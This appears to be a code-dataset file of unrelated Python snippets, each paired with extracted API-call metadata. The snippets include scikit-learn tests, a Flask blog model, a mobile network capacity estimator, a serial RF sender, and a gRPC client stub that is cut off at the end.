# (https://ai.googleblog.com/2020/07/announcing-scann-efficient-vector.html)
# and a library for it,
# released by Google recently,
# on July 28, 2020.
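#
# A toy random-hyperplane LSH sketch (illustrative only, not in the original
# notebook; documents whose sign signature matches the query's share a bucket):
# In[ ]:
n_planes = 8
rng = np.random.default_rng(0)
planes = rng.normal(size=(n_planes, X_tfidf.shape[1]))
doc_bits = np.asarray(X_tfidf @ planes.T) > 0    # one n_planes-bit signature per law
query_bits = np.asarray(query @ planes.T) > 0
same_bucket = np.where((doc_bits == query_bits).all(axis=1))[0]
print(f"{len(same_bucket)} laws share the query's bucket")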
#
# ### Evaluation
# With multiple ways to index and retrieve comes the dilemma:
# how do we tell whether one is better than another?
# Repeat the process above for every option?
# That is, show the top N results and compare them manually?
# Or label some of the laws?
# E.g.: this law is about such a topic, and mentions such entities.
# Evaluation approaches still need to be looked into.
# If this were in production,
# we could evaluate by _click-through rate_ (CTR), for example,
# but that is not the case.
|
[
"sklearn.feature_extraction.text.CountVectorizer",
"sklearn.metrics.pairwise.cosine_similarity",
"pandas.read_json",
"numpy.argsort",
"scripts.nlp.remove_portuguese_stopwords",
"sklearn.feature_extraction.text.TfidfTransformer"
] |
[((1247, 1272), 'pandas.read_json', 'pd.read_json', (['"""leis.json"""'], {}), "('leis.json')\n", (1259, 1272), True, 'import pandas as pd\n'), ((2097, 2114), 'sklearn.feature_extraction.text.CountVectorizer', 'CountVectorizer', ([], {}), '()\n', (2112, 2114), False, 'from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\n'), ((2194, 2212), 'sklearn.feature_extraction.text.TfidfTransformer', 'TfidfTransformer', ([], {}), '()\n', (2210, 2212), False, 'from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\n'), ((2314, 2351), 'scripts.nlp.remove_portuguese_stopwords', 'remove_portuguese_stopwords', (['query[0]'], {}), '(query[0])\n', (2341, 2351), False, 'from scripts.nlp import remove_portuguese_stopwords\n'), ((2453, 2486), 'sklearn.metrics.pairwise.cosine_similarity', 'cosine_similarity', (['query', 'X_tfidf'], {}), '(query, X_tfidf)\n', (2470, 2486), False, 'from sklearn.metrics.pairwise import cosine_similarity\n'), ((2506, 2530), 'numpy.argsort', 'np.argsort', (['best_matches'], {}), '(best_matches)\n', (2516, 2530), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
import os
import numpy as np
import subprocess as subp
from sklearn.datasets import load_iris
from sklearn.datasets import load_breast_cancer
from sklearn.datasets import load_digits
from sklearn.utils import shuffle
from tests.utils.Timer import Timer
from tests.estimator.classifier.SeparatedData import SeparatedData
class Classifier(Timer, SeparatedData):
N_RANDOM_FEATURE_SETS = 30
N_EXISTING_FEATURE_SETS = 30
def setUp(self):
np.random.seed(5)
self._init_env()
self._start_test()
def tearDown(self):
self._clear_estimator()
self._stop_test()
def _init_env(self):
for param in ['N_RANDOM_FEATURE_SETS', 'N_EXISTING_FEATURE_SETS']:
n = os.environ.get(param, None)
if n is not None and str(n).strip().isdigit():
n = int(n)
if n > 0:
self.__setattr__(param, n)
def load_binary_data(self, shuffled=True):
samples = load_breast_cancer()
        if shuffled:
            # shuffle features and labels together so their pairing is preserved
            self.X, self.y = shuffle(samples.data, samples.target)
        else:
            self.X, self.y = samples.data, samples.target
self.n_features = len(self.X[0])
def load_iris_data(self, shuffled=True):
samples = load_iris()
        if shuffled:
            self.X, self.y = shuffle(samples.data, samples.target)
        else:
            self.X, self.y = samples.data, samples.target
self.n_features = len(self.X[0])
def load_digits_data(self, shuffled=True):
samples = load_digits()
        if shuffled:
            self.X, self.y = shuffle(samples.data, samples.target)
        else:
            self.X, self.y = samples.data, samples.target
self.n_features = len(self.X[0])
def _clear_estimator(self):
self.estimator = None
cmd = 'rm -rf tmp'.split()
subp.call(cmd)
|
[
"sklearn.datasets.load_iris",
"sklearn.datasets.load_digits",
"numpy.random.seed",
"sklearn.datasets.load_breast_cancer",
"os.environ.get",
"subprocess.call",
"sklearn.utils.shuffle"
] |
[((484, 501), 'numpy.random.seed', 'np.random.seed', (['(5)'], {}), '(5)\n', (498, 501), True, 'import numpy as np\n'), ((1007, 1027), 'sklearn.datasets.load_breast_cancer', 'load_breast_cancer', ([], {}), '()\n', (1025, 1027), False, 'from sklearn.datasets import load_breast_cancer\n'), ((1275, 1286), 'sklearn.datasets.load_iris', 'load_iris', ([], {}), '()\n', (1284, 1286), False, 'from sklearn.datasets import load_iris\n'), ((1536, 1549), 'sklearn.datasets.load_digits', 'load_digits', ([], {}), '()\n', (1547, 1549), False, 'from sklearn.datasets import load_digits\n'), ((1839, 1853), 'subprocess.call', 'subp.call', (['cmd'], {}), '(cmd)\n', (1848, 1853), True, 'import subprocess as subp\n'), ((754, 781), 'os.environ.get', 'os.environ.get', (['param', 'None'], {}), '(param, None)\n', (768, 781), False, 'import os\n'), ((1045, 1066), 'sklearn.utils.shuffle', 'shuffle', (['samples.data'], {}), '(samples.data)\n', (1052, 1066), False, 'from sklearn.utils import shuffle\n'), ((1114, 1137), 'sklearn.utils.shuffle', 'shuffle', (['samples.target'], {}), '(samples.target)\n', (1121, 1137), False, 'from sklearn.utils import shuffle\n'), ((1304, 1325), 'sklearn.utils.shuffle', 'shuffle', (['samples.data'], {}), '(samples.data)\n', (1311, 1325), False, 'from sklearn.utils import shuffle\n'), ((1373, 1396), 'sklearn.utils.shuffle', 'shuffle', (['samples.target'], {}), '(samples.target)\n', (1380, 1396), False, 'from sklearn.utils import shuffle\n'), ((1567, 1588), 'sklearn.utils.shuffle', 'shuffle', (['samples.data'], {}), '(samples.data)\n', (1574, 1588), False, 'from sklearn.utils import shuffle\n'), ((1636, 1659), 'sklearn.utils.shuffle', 'shuffle', (['samples.target'], {}), '(samples.target)\n', (1643, 1659), False, 'from sklearn.utils import shuffle\n')]
|
import cv2 as cv
capture = cv.VideoCapture('opencv_practicas/VID_20200312_162550.mp4')
while True:
    isTrue, frame = capture.read()
    if not isTrue:  # stop when the video ends instead of passing None to imshow
        break
    cv.imshow('video', frame)
    if cv.waitKey(20) & 0xFF == ord('d'):
break
capture.release()
cv.destroyAllWindows()
|
[
"cv2.VideoCapture",
"cv2.destroyAllWindows",
"cv2.imshow",
"cv2.waitKey"
] |
[((28, 87), 'cv2.VideoCapture', 'cv.VideoCapture', (['"""opencv_practicas/VID_20200312_162550.mp4"""'], {}), "('opencv_practicas/VID_20200312_162550.mp4')\n", (43, 87), True, 'import cv2 as cv\n'), ((241, 263), 'cv2.destroyAllWindows', 'cv.destroyAllWindows', ([], {}), '()\n', (261, 263), True, 'import cv2 as cv\n'), ((142, 167), 'cv2.imshow', 'cv.imshow', (['"""video"""', 'frame'], {}), "('video', frame)\n", (151, 167), True, 'import cv2 as cv\n'), ((176, 190), 'cv2.waitKey', 'cv.waitKey', (['(20)'], {}), '(20)\n', (186, 190), True, 'import cv2 as cv\n')]
|
import preprocess_directory
import unittest
FIXTURES_DIRECTORY_PATH = "Fixtures"
class TestGetImages(unittest.TestCase):
"""
    Tests for the get_all_images function from the preprocess_directory.py file
"""
def test_check_file(self):
"""
        Test for the get_all_images function, verifying that the expected image is found in the fixtures directory.
"""
result = preprocess_directory.get_all_images(FIXTURES_DIRECTORY_PATH)
self.assertEqual(1, len(result))
self.assertTrue("test2.jpg" in result[0])
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"preprocess_directory.get_all_images"
] |
[((617, 632), 'unittest.main', 'unittest.main', ([], {}), '()\n', (630, 632), False, 'import unittest\n'), ((432, 492), 'preprocess_directory.get_all_images', 'preprocess_directory.get_all_images', (['FIXTURES_DIRECTORY_PATH'], {}), '(FIXTURES_DIRECTORY_PATH)\n', (467, 492), False, 'import preprocess_directory\n')]
|
import logging
import requests
import json
import azure.functions as func
def main(req: func.HttpRequest, config: str) -> func.HttpResponse:
configuration = json.loads(config)
response = requests.get(configuration["websiteUrl"])
logging.info("%s -> %s" % (response.url, response.reason))
return func.HttpResponse(
"%s -> %s" % (response.url, response.reason),
status_code=response.status_code
)
|
[
"azure.functions.HttpResponse",
"logging.info",
"json.loads",
"requests.get"
] |
[((168, 186), 'json.loads', 'json.loads', (['config'], {}), '(config)\n', (178, 186), False, 'import json\n'), ((203, 244), 'requests.get', 'requests.get', (["configuration['websiteUrl']"], {}), "(configuration['websiteUrl'])\n", (215, 244), False, 'import requests\n'), ((250, 308), 'logging.info', 'logging.info', (["('%s -> %s' % (response.url, response.reason))"], {}), "('%s -> %s' % (response.url, response.reason))\n", (262, 308), False, 'import logging\n'), ((321, 423), 'azure.functions.HttpResponse', 'func.HttpResponse', (["('%s -> %s' % (response.url, response.reason))"], {'status_code': 'response.status_code'}), "('%s -> %s' % (response.url, response.reason), status_code\n =response.status_code)\n", (338, 423), True, 'import azure.functions as func\n')]
|
"""Urls for the Zinnia comments"""
from django.conf.urls import url
from zinnia.urls import _
from zinnia.views.comments import CommentSuccess
urlpatterns = [
url(_(r'^success/$'),
CommentSuccess.as_view(),
name='comment_success'),
]
|
[
"zinnia.urls._",
"zinnia.views.comments.CommentSuccess.as_view"
] |
[((170, 185), 'zinnia.urls._', '_', (['"""^success/$"""'], {}), "('^success/$')\n", (171, 185), False, 'from zinnia.urls import _\n'), ((196, 220), 'zinnia.views.comments.CommentSuccess.as_view', 'CommentSuccess.as_view', ([], {}), '()\n', (218, 220), False, 'from zinnia.views.comments import CommentSuccess\n')]
|
'''
Defines database models.
'''
from flask_login import UserMixin
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.sql import func
from hashids import Hashids
import bcrypt
from blog.helpers import is_username, is_email, is_password, in_database
from blog import app
db = SQLAlchemy(app)
class User(db.Model, UserMixin):
'''
Model that represents users in the database.
'''
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(32), unique=True)
email = db.Column(db.String(320), unique=True)
password = db.Column(db.String(60))
posts = db.relationship('Post')
comments = db.relationship('Comment')
class Post(db.Model):
'''
Model that represents user's posts in the database.
'''
id = db.Column(db.Integer, primary_key=True)
date = db.Column(db.DateTime(timezone=True), default=func.now())
title = db.Column(db.String(64), unique=True)
hash = db.Column(db.Text, unique=True)
content = db.Column(db.Text)
username = db.Column(db.String(32), db.ForeignKey('user.username'))
comments = db.relationship('Comment', cascade="all, delete-orphan")
class Comment(db.Model):
'''
Model that represents user's comments in the database.
'''
id = db.Column(db.Integer, primary_key=True)
date = db.Column(db.DateTime(timezone=True), default=func.now())
username = db.Column(db.String(32), db.ForeignKey('user.username'))
post_hash = db.Column(db.Text, db.ForeignKey('post.hash'))
hash = db.Column(db.Text, unique=True)
msg = db.Column(db.Text)
db.create_all()
def register(username, email, password1, password2):
'''
Creates new users & adds them to the database.
Returns the new user if given valid input.
'''
if not is_email(email):
return 'Email not valid.'
users = User.query.filter_by(email=email).all()
if len(users) != 0:
return 'Email already taken.'
if not is_username(username):
return 'Username not valid.'
users = User.query.filter_by(username=username).all()
if len(users) != 0:
return 'Username already taken.'
if not is_password(password1):
return 'Password not valid.'
if password1 != password2:
return 'Passwords do not match.'
user = User(
username=username,
email=email,
password=bcrypt.hashpw(password1.encode('utf-8'), bcrypt.gensalt())
)
db.session.add(user)
db.session.commit()
return user
def login(email, password):
'''
Takes email & password to see if a user with those credentials
exists in the database.
Returns the user if they exist in the database.
'''
user = User.query.filter_by(email=email).first()
if user is None:
return None
if not bcrypt.checkpw(password.encode('utf-8'), user.password):
return None
return user
def post(user, title, content):
'''
Creates a new post by user with given title & content.
Returns the new post if given a valid title & content.
'''
if not in_database(User, user):
return None
if len(title) > 64 or len(title) < 3:
return None
existing_post = Post.query.filter_by(title=title.title()).first()
if existing_post:
return None
new_post = Post(
username=user.username,
title=title.title(),
content=content
)
db.session.add(new_post)
db.session.commit()
hashids = Hashids(min_length=5, salt=app.config['SECRET_KEY'])
new_post.hash = hashids.encode(new_post.id) + 'P'
db.session.commit()
return new_post
def comment(user, post, msg):
'''
Creates comment by user on post.
Returns the new comment if passed a real post and valid message.
'''
if not in_database(User, user) or not in_database(Post, post):
return None
if len(msg) < 2:
return None
comment = Comment(
username=user.username,
post_hash=post.hash,
msg=msg
)
db.session.add(comment)
db.session.commit()
hashids = Hashids(min_length=5, salt=app.config['SECRET_KEY'])
comment.hash = hashids.encode(comment.id) + 'C'
db.session.commit()
return comment
def delete(item):
'''
Delete entry in database table
'''
db.session.delete(item)
db.session.commit()
|
[
"blog.helpers.in_database",
"sqlalchemy.sql.func.now",
"bcrypt.gensalt",
"blog.helpers.is_email",
"hashids.Hashids",
"flask_sqlalchemy.SQLAlchemy",
"blog.helpers.is_username",
"blog.helpers.is_password"
] |
[((283, 298), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', (['app'], {}), '(app)\n', (293, 298), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((3467, 3519), 'hashids.Hashids', 'Hashids', ([], {'min_length': '(5)', 'salt': "app.config['SECRET_KEY']"}), "(min_length=5, salt=app.config['SECRET_KEY'])\n", (3474, 3519), False, 'from hashids import Hashids\n'), ((4074, 4126), 'hashids.Hashids', 'Hashids', ([], {'min_length': '(5)', 'salt': "app.config['SECRET_KEY']"}), "(min_length=5, salt=app.config['SECRET_KEY'])\n", (4081, 4126), False, 'from hashids import Hashids\n'), ((1779, 1794), 'blog.helpers.is_email', 'is_email', (['email'], {}), '(email)\n', (1787, 1794), False, 'from blog.helpers import is_username, is_email, is_password, in_database\n'), ((1955, 1976), 'blog.helpers.is_username', 'is_username', (['username'], {}), '(username)\n', (1966, 1976), False, 'from blog.helpers import is_username, is_email, is_password, in_database\n'), ((2149, 2171), 'blog.helpers.is_password', 'is_password', (['password1'], {}), '(password1)\n', (2160, 2171), False, 'from blog.helpers import is_username, is_email, is_password, in_database\n'), ((3066, 3089), 'blog.helpers.in_database', 'in_database', (['User', 'user'], {}), '(User, user)\n', (3077, 3089), False, 'from blog.helpers import is_username, is_email, is_password, in_database\n'), ((872, 882), 'sqlalchemy.sql.func.now', 'func.now', ([], {}), '()\n', (880, 882), False, 'from sqlalchemy.sql import func\n'), ((1362, 1372), 'sqlalchemy.sql.func.now', 'func.now', ([], {}), '()\n', (1370, 1372), False, 'from sqlalchemy.sql import func\n'), ((3783, 3806), 'blog.helpers.in_database', 'in_database', (['User', 'user'], {}), '(User, user)\n', (3794, 3806), False, 'from blog.helpers import is_username, is_email, is_password, in_database\n'), ((3814, 3837), 'blog.helpers.in_database', 'in_database', (['Post', 'post'], {}), '(Post, post)\n', (3825, 3837), False, 'from blog.helpers import is_username, is_email, is_password, in_database\n'), ((2406, 2422), 'bcrypt.gensalt', 'bcrypt.gensalt', ([], {}), '()\n', (2420, 2422), False, 'import bcrypt\n')]
|
import datetime
from .stwno_constants import CSV_MEAL_TYPE_MAP,\
CSV_NUTRITION_TYPE_MAP,\
NutritionType,\
CSV_DATE_FORMAT,\
MealType,\
NutritionType,\
STWNO_INGREDIENTS,\
STWNO_ALLERGENS
class NoValidDateStringException(Exception):
pass
class UnknownMealTypeException(Exception):
pass
class UnknownNutritionTypeException(Exception):
pass
class UnknownIngredientException(Exception):
pass
class StwnoFoodIngredient():
identifier: str
name: str
def __init__(self, identifier, name):
self.name = name
self.identifier = identifier
def convertCSVDishName(name: str) -> str:
name = name.strip()
indexBracket = name.find('(')
if indexBracket == -1:
return name
return name[0:indexBracket].strip()
def convertCSVMealType(mealType: str) -> MealType:
mealTypeID = ''.join(filter(str.isalpha, mealType))
mType = CSV_MEAL_TYPE_MAP.get(mealTypeID)
if mType != None:
return mType
else:
raise UnknownMealTypeException(
'MealType {} is not in the list of known meal types'.format(mType))
def convertCSVNutritionType(nutritionType: str) -> NutritionType:
nutType = CSV_NUTRITION_TYPE_MAP.get(nutritionType)
if nutType != None:
return nutType
else:
return NutritionType.meat
def convertCSVDate(dateStr: str) -> datetime.date:
try:
return datetime.datetime.strptime(dateStr, CSV_DATE_FORMAT).date()
except ValueError:
raise NoValidDateStringException
def convertCSVIngredientsAndAllergens(mealNameStr: str) -> str:
ingredientIdentifiers = mealNameStr.replace(' ', '').split(',')
ingredients = []
allergens = []
for identifier in ingredientIdentifiers:
name = None
if name := STWNO_INGREDIENTS.get(identifier):
ingredients.append(StwnoFoodIngredient(identifier, name))
elif name := STWNO_ALLERGENS.get(identifier):
allergens.append(StwnoFoodIngredient(identifier, name))
else:
raise UnknownIngredientException(
'Ingredient {} is neither a known inredient nor an allergene'.format(identifier))
return ingredients, allergens
|
[
"datetime.datetime.strptime"
] |
[((1419, 1471), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['dateStr', 'CSV_DATE_FORMAT'], {}), '(dateStr, CSV_DATE_FORMAT)\n', (1445, 1471), False, 'import datetime\n')]
|
#!/usr/bin/env python3
"""Tool for plotting the Voronoi tessellation described by the provided data
Note that the seeds of the tessellation are based on the provided towers file,
not computed from the cells. The tool also prints to the console the number
of towers and number of cells. Towers without an associated cell are shown in
green, while other towers are shown in red.
"""
from matplotlib import pyplot as plt # type: ignore
from shapely.geometry import MultiPolygon # type: ignore
from descartes import PolygonPatch # type: ignore
from data_interface import(
load_voronoi_cells,
load_towers,
VORONOI_PATH,
TOWERS_PATH,
)
def plot_polygon(axes: plt.axes, polygon: MultiPolygon) -> None:
"""Add a polygon to an axes
Args:
axes: The axes to add the polygon to
polygon: The polygon to add
Returns:
None
"""
patch = PolygonPatch(polygon, facecolor=[0, 0, 0.5], edgecolor=[0, 0, 0],
alpha=0.5)
axes.add_patch(patch)
if __name__ == '__main__':
# pragma pylint: disable=invalid-name
cells = load_voronoi_cells(VORONOI_PATH)
towers = load_towers(TOWERS_PATH)
print('Number of Cells: ', len(cells), 'Number of Towers: ', len(towers))
# Learned how to plot from:
# https://chrishavlin.com/2016/11/28/shapefiles-in-python-polygons/
plt.ioff()
fig = plt.figure()
# (left, bottom, width, height) in units of fractions of figure dimensions
ax = fig.add_axes((0.1, 0.1, 0.9, 0.9))
ax.set_aspect(1)
no_coor_indices = []
for i, cell in enumerate(cells):
plot_polygon(ax, cell)
if cell.area == 0:
no_coor_indices.append(i)
for i, (lat, lng) in enumerate(towers):
color = 'red'
if i in no_coor_indices:
color = 'green'
ax.plot(lat, lng, color=color, marker='o', markersize=2, alpha=0.5)
# Showed how to auto-resize axes: https://stackoverflow.com/a/11039268
ax.relim()
ax.autoscale_view()
plt.show()
|
[
"descartes.PolygonPatch",
"data_interface.load_voronoi_cells",
"matplotlib.pyplot.show",
"matplotlib.pyplot.ioff",
"data_interface.load_towers",
"matplotlib.pyplot.figure"
] |
[((890, 966), 'descartes.PolygonPatch', 'PolygonPatch', (['polygon'], {'facecolor': '[0, 0, 0.5]', 'edgecolor': '[0, 0, 0]', 'alpha': '(0.5)'}), '(polygon, facecolor=[0, 0, 0.5], edgecolor=[0, 0, 0], alpha=0.5)\n', (902, 966), False, 'from descartes import PolygonPatch\n'), ((1101, 1133), 'data_interface.load_voronoi_cells', 'load_voronoi_cells', (['VORONOI_PATH'], {}), '(VORONOI_PATH)\n', (1119, 1133), False, 'from data_interface import load_voronoi_cells, load_towers, VORONOI_PATH, TOWERS_PATH\n'), ((1147, 1171), 'data_interface.load_towers', 'load_towers', (['TOWERS_PATH'], {}), '(TOWERS_PATH)\n', (1158, 1171), False, 'from data_interface import load_voronoi_cells, load_towers, VORONOI_PATH, TOWERS_PATH\n'), ((1359, 1369), 'matplotlib.pyplot.ioff', 'plt.ioff', ([], {}), '()\n', (1367, 1369), True, 'from matplotlib import pyplot as plt\n'), ((1381, 1393), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1391, 1393), True, 'from matplotlib import pyplot as plt\n'), ((2020, 2030), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2028, 2030), True, 'from matplotlib import pyplot as plt\n')]
|
from setuptools import setup
setup(name = 'infupy',
version = '2022.1.11',
description = 'Syringe pump infusion',
url = 'https://github.com/jaj42/infupy',
author = '<NAME>',
author_email = '<EMAIL>',
license = 'ISC',
packages = ['infupy', 'infupy.backends', 'infupy.gui'],
install_requires=[
'pyserial',
'crcmod',
'qtpy'
],
scripts = [
'scripts/syre.pyw'
]
)
|
[
"setuptools.setup"
] |
[((30, 354), 'setuptools.setup', 'setup', ([], {'name': '"""infupy"""', 'version': '"""2022.1.11"""', 'description': '"""Syringe pump infusion"""', 'url': '"""https://github.com/jaj42/infupy"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'license': '"""ISC"""', 'packages': "['infupy', 'infupy.backends', 'infupy.gui']", 'install_requires': "['pyserial', 'crcmod', 'qtpy']", 'scripts': "['scripts/syre.pyw']"}), "(name='infupy', version='2022.1.11', description=\n 'Syringe pump infusion', url='https://github.com/jaj42/infupy', author=\n '<NAME>', author_email='<EMAIL>', license='ISC', packages=['infupy',\n 'infupy.backends', 'infupy.gui'], install_requires=['pyserial',\n 'crcmod', 'qtpy'], scripts=['scripts/syre.pyw'])\n", (35, 354), False, 'from setuptools import setup\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, division, print_function, absolute_import
import sys
import platform
import argparse
import os
from pyt import tester, __version__, main
from pyt.compat import *
def console():
# ripped from unittest.__main__.py
if sys.argv[0].endswith("__main__.py"):
executable = os.path.basename(sys.executable)
sys.argv[0] = executable + " -m pyt"
if is_py2:
from unittest.main import USAGE_AS_MAIN
main.USAGE = USAGE_AS_MAIN
main(module=None)
if __name__ == "__main__":
# allow both imports of this module, for entry_points, and also running this module using python -m pyt
console()
|
[
"pyt.main",
"os.path.basename"
] |
[((553, 570), 'pyt.main', 'main', ([], {'module': 'None'}), '(module=None)\n', (557, 570), False, 'from pyt import tester, __version__, main\n'), ((371, 403), 'os.path.basename', 'os.path.basename', (['sys.executable'], {}), '(sys.executable)\n', (387, 403), False, 'import os\n')]
|
"""
Capacity estimation method.
Written by <NAME>
December 12th 2019
This method can be used for any spatially aggregated unit, such as
postcode sectors or local authority districts. First, a points in
polygon analysis needs to provide the total number of 4G or 5G sites
in an area, in order to then get the density of assets. This method
then allocates the estimated capacity to the area.
"""
import os
import sys
import configparser
import csv
from itertools import tee
from collections import OrderedDict
CONFIG = configparser.ConfigParser()
CONFIG.read(os.path.join(os.path.dirname(__file__), 'script_config.ini'))
BASE_PATH = CONFIG['file_locations']['base_path']
DATA_RAW = os.path.join(BASE_PATH, 'raw')
DATA_INTERMEDIATE = os.path.join(BASE_PATH, 'intermediate')
def load_capacity_lookup_table(path):
"""
Load a lookup table created using pysim5G:
https://github.com/edwardoughton/pysim5g
"""
capacity_lookup_table = {}
# for path in PATH_LIST:
with open(path, 'r') as capacity_lookup_file:
reader = csv.DictReader(capacity_lookup_file)
for row in reader:
if float(row["capacity_mbps_km2"]) <= 0:
continue
environment = row["environment"].lower()
cell_type = row["ant_type"]
frequency = str(int(float(row["frequency_GHz"]) * 1e3))
bandwidth = str(row["bandwidth_MHz"])
generation = str(row["generation"])
density = float(row["sites_per_km2"])
capacity = float(row["capacity_mbps_km2"])
if (environment, cell_type, frequency, bandwidth, generation) \
not in capacity_lookup_table:
capacity_lookup_table[(
environment, cell_type, frequency, bandwidth, generation)
] = []
capacity_lookup_table[(
environment, cell_type, frequency, bandwidth, generation
)].append((
density, capacity
))
for key, value_list in capacity_lookup_table.items():
value_list.sort(key=lambda tup: tup[0])
return capacity_lookup_table
def estimate_area_capacity(assets, area, clutter_environment,
capacity_lookup_table, simulation_parameters):
"""
Find the macrocellular Radio Access Network capacity given the
area assets and deployed frequency bands.
"""
capacity = 0
for frequency in ['700', '800', '1800', '2600', '3500', '26000']:
unique_sites = set()
for asset in assets:
for asset_frequency in asset['frequency']:
if asset_frequency == frequency:
unique_sites.add(asset['site_ngr'])
site_density = float(len(unique_sites)) / area
bandwidth = find_frequency_bandwidth(frequency,
simulation_parameters)
if frequency == '700' or frequency == '3500' or frequency == '26000':
generation = '5G'
else:
generation = '4G'
if site_density > 0:
tech_capacity = lookup_capacity(
capacity_lookup_table,
clutter_environment,
'macro',
str(frequency),
str(bandwidth),
generation,
site_density,
)
else:
tech_capacity = 0
capacity += tech_capacity
return capacity
def find_frequency_bandwidth(frequency, simulation_parameters):
"""
Finds the correct bandwidth for a specific frequency from the
simulation parameters.
"""
simulation_parameter = 'channel_bandwidth_{}'.format(frequency)
if simulation_parameter not in simulation_parameters.keys():
KeyError('{} not specified in simulation_parameters'.format(frequency))
bandwidth = simulation_parameters[simulation_parameter]
return bandwidth
def pairwise(iterable):
"""
Return iterable of 2-tuples in a sliding window.
>>> list(pairwise([1,2,3,4]))
[(1,2),(2,3),(3,4)]
"""
a, b = tee(iterable)
next(b, None)
return zip(a, b)
def lookup_capacity(lookup_table, environment, cell_type, frequency, bandwidth,
generation, site_density):
"""
Use lookup table to find capacity by clutter environment geotype,
frequency, bandwidth, technology generation and site density.
"""
# print(lookup_table)
if (environment, cell_type, frequency, bandwidth, generation) not in lookup_table:
raise KeyError("Combination %s not found in lookup table",
(environment, cell_type, frequency, bandwidth, generation))
density_capacities = lookup_table[
(environment, cell_type, frequency, bandwidth, generation)
]
lowest_density, lowest_capacity = density_capacities[0]
if site_density < lowest_density:
return 0
for a, b in pairwise(density_capacities):
lower_density, lower_capacity = a
upper_density, upper_capacity = b
if lower_density <= site_density and site_density < upper_density:
result = interpolate(
lower_density, lower_capacity,
upper_density, upper_capacity,
site_density
)
return result
# If not caught between bounds return highest capacity
highest_density, highest_capacity = density_capacities[-1]
return highest_capacity
def interpolate(x0, y0, x1, y1, x):
"""
Linear interpolation between two values.
"""
y = (y0 * (x1 - x) + y1 * (x - x0)) / (x1 - x0)
return y
if __name__ == '__main__':
#define parameters
PARAMETERS = {
'channel_bandwidth_700': '10',
'channel_bandwidth_800': '10',
'channel_bandwidth_1800': '10',
'channel_bandwidth_2600': '10',
'channel_bandwidth_3500': '40',
'channel_bandwidth_3700': '40',
'channel_bandwidth_26000': '200',
'macro_sectors': 3,
'small-cell_sectors': 1,
'mast_height': 30,
}
#define assets
ASSETS = [
{
'site_ngr': 'A',
'frequency': ['800', '2600'],
'technology': '4G',
'type': 'macrocell_site',
'bandwidth': '2x10MHz',
'build_date': 2018,
},
{
'site_ngr': 'B',
'frequency': ['800', '2600'],
'technology': '4G',
'type': 'macrocell_site',
'bandwidth': '2x10MHz',
'build_date': 2018,
},
]
path = os.path.join(DATA_RAW, 'capacity_lut_by_frequency_10.csv')
capacity_lookup_table = load_capacity_lookup_table(path)
area_capacity = estimate_area_capacity(ASSETS, 10, 'urban',
capacity_lookup_table, PARAMETERS)
print(area_capacity)
|
[
"csv.DictReader",
"os.path.dirname",
"itertools.tee",
"configparser.ConfigParser",
"os.path.join"
] |
[((523, 550), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (548, 550), False, 'import configparser\n'), ((687, 717), 'os.path.join', 'os.path.join', (['BASE_PATH', '"""raw"""'], {}), "(BASE_PATH, 'raw')\n", (699, 717), False, 'import os\n'), ((738, 777), 'os.path.join', 'os.path.join', (['BASE_PATH', '"""intermediate"""'], {}), "(BASE_PATH, 'intermediate')\n", (750, 777), False, 'import os\n'), ((4077, 4090), 'itertools.tee', 'tee', (['iterable'], {}), '(iterable)\n', (4080, 4090), False, 'from itertools import tee\n'), ((6570, 6628), 'os.path.join', 'os.path.join', (['DATA_RAW', '"""capacity_lut_by_frequency_10.csv"""'], {}), "(DATA_RAW, 'capacity_lut_by_frequency_10.csv')\n", (6582, 6628), False, 'import os\n'), ((576, 601), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (591, 601), False, 'import os\n'), ((1055, 1091), 'csv.DictReader', 'csv.DictReader', (['capacity_lookup_file'], {}), '(capacity_lookup_file)\n', (1069, 1091), False, 'import csv\n')]
|
import serial
import struct
rf_channel_list = [b"\x01", b"\x02", b"\x03", b"\x04"]
def send_rf_command(config_class, channel, is_study = False):
ser = serial.Serial(
port = config_class.tty,
baudrate = 9600,
parity = serial.PARITY_NONE,
stopbits = serial.STOPBITS_ONE,
bytesize = serial.EIGHTBITS
)
ser.flushInput()
ser.flushOutput()
if is_study:
data = b"\xAA"
else:
data = b"\xBB"
data += rf_channel_list[channel]
data += b"\xFF"
ser.write(data)
ser.flushInput()
ser.flushOutput()
ser.close()
|
[
"serial.Serial"
] |
[((157, 297), 'serial.Serial', 'serial.Serial', ([], {'port': 'config_class.tty', 'baudrate': '(9600)', 'parity': 'serial.PARITY_NONE', 'stopbits': 'serial.STOPBITS_ONE', 'bytesize': 'serial.EIGHTBITS'}), '(port=config_class.tty, baudrate=9600, parity=serial.\n PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS)\n', (170, 297), False, 'import serial\n')]
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
import test_evocraft_py.minecraft_pb2 as minecraft__pb2
class MinecraftServiceStub(object):
"""*
The main service.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.spawnBlocks = channel.unary_unary(
'/dk.itu.real.ooe.MinecraftService/spawnBlocks',
request_serializer=minecraft__pb2.Blocks.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.readCube = channel.unary_unary(
'/dk.itu.real.ooe.MinecraftService/readCube',
request_serializer=minecraft__pb2.Cube.SerializeToString,
response_deserializer=minecraft__pb2.Blocks.FromString,
)
self.fillCube = channel.unary_unary(
'/dk.itu.real.ooe.MinecraftService/fillCube',
request_serializer=minecraft__pb2.FillCubeRequest.SerializeToString,
